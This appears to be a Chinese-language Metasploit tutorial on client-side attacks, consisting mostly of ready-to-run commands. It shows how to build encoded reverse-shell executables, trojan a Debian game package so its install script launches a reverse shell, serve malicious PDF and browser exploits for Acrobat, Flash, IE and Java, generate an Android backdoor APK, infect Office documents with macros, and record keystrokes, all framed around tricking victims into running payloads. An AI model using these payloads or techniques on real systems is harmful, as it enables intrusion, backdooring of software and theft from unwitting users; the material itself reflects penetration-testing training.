Mestasploit --- 客户端渗透

目录

 

1. 简介

2. 攻击 windows

3. 攻击 linux

4. 利用 Acrobat Reader 漏洞执行 payload

5. 利用 flash 插件漏洞执行 paylaod

6. 利用 IE 浏览器漏洞执行 payload

7. 利用 JRE 漏洞执行 payload

8. 生成 android 后门程序

9. 宏感染


1. 简介

  • 在无法突破网络边界的情况下转而攻击客户端

    • 社会工程学攻击
    • 进而渗透线上业务网络
  • 含有漏洞利用代码的 web 站点

    • 利用客户端漏洞
  • 含有漏洞利用代码的 doc、pdf等文档

  • 诱骗被害者执行 payload

2. 攻击 windows

  • 诱骗被害者执行 payload (windows)

    • msfvenom –payload-options -p windows/shell/reverse_tcp
    • msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe

      root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
      root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
      # 将文件拷贝到 winxp 主机
      
  • msfconsole

    • use exploit/multi/handler
    • set payload windows/shell/reverse_tcp
    • set LHOST 10.10.10.131
    • set LPORT 4444
    • exploit
    • 客户端执行文件

      msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
      msf exploit(multi/handler) > set LHOST 10.10.10.131
      msf exploit(multi/handler) > set LPORT 4444
      msf exploit(multi/handler) > exploit
      

3. 攻击 linux

  • 诱骗被害者执行 payload (linux deb 安装包)
root@kali:~# apt-get --download-only install freesweep
root@kali:~# cd /var/cache/apt/archives/
root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~
root@kali:~# cd 
root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free
root@kali:~# cd free
root@kali:~/free# mkdir DEBIAN/
root@kali:~/free# cd DEBIAN/

root@kali:~/free/DEBIAN# vim control 
Package: freesweep
Version: 0.90-3
Section: Games and Amusement
Priority: optional
Architecture:amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
Description: a text-based minesweeper
    Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.

root@kali:~/free/DEBIAN# vim postinst
    #!/bin/sh
    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
root@kali:~/free# chmod 755 postinst 

# 生成 payload
root@kali:~/free/DEBIANn# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores

root@kali:~/free/DEBIAN# dpkg-deb --build /root/free

# 受害者机器安装此软件
root@lamp:/home/kevin/Desktop# dpkg -i free.deb 

4. 利用 Acrobat Reader 漏洞执行 payload

  • 构造 pdf 文件:use exploit/windows/fileformat/adobe_utilprintf

    # 构造 pdf 文件
    use exploit/windows/fileformat/adobe_utilprintf
    set payload windows/meterpreter/reverse_tcp
    msf exploit(windows/fileformat/adobe_utilprintf) > run
        [+] msf.pdf stored at /root/.msf4/local/msf.pdf
    
    # 开启监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit 
    
  • 构造恶意网站:use exploit/windows/browser/adobe_utilprintf

    use exploit/windows/browser/adobe_utilprintf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • Meterpreter

    • use priv
    • run post/windows/capture/keylog_recorder

5. 利用 flash 插件漏洞执行 paylaod

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf

    use exploit/multi/browser/adobe_flash_hacking_team_uaf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/adobe_flash_opaque_background_uaf

    use exploit/multi/browser/adobe_flash_opaque_background_uaf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use auxiliary/server/browser_autopwn2

    use auxiliary/server/browser_autopwn2
    set SRVPORT 80
    set URIPATH /
    exploit
    

6. 利用 IE 浏览器漏洞执行 payload

  • use exploit/windows/browser/ms14_064_ole_code_execution

    use exploit/windows/browser/ms14_064_ole_code_execution
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    

7. 利用 JRE 漏洞执行 payload

  • use exploit/multi/browser/java_jre17_driver_manager

    use exploit/multi/browser/java_jre17_driver_manager
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/java_jre17_jmxbean

    use exploit/multi/browser/java_jre17_jmxbean
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/java_jre17_reflection_types

    use exploit/multi/browser/java_jre17_reflection_types
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    

8. 生成 android 后门程序

  • use payload/android/meterpreter/reverse_tcp
  • generate -f a.apk -p android -t raw

9. 宏感染

  • 利用宏感染 word、except 文档
  • 绕过某些基于文件类型检查的安全机制
  • 生成 vbscript 脚本:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

  • office 2007 +

  • payload 第一部分粘入 VBA 代码
  • payload 第二部分粘入 word 正文

  • msf 启动侦听

    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp

你可能感兴趣的:(Mestasploit,Framework)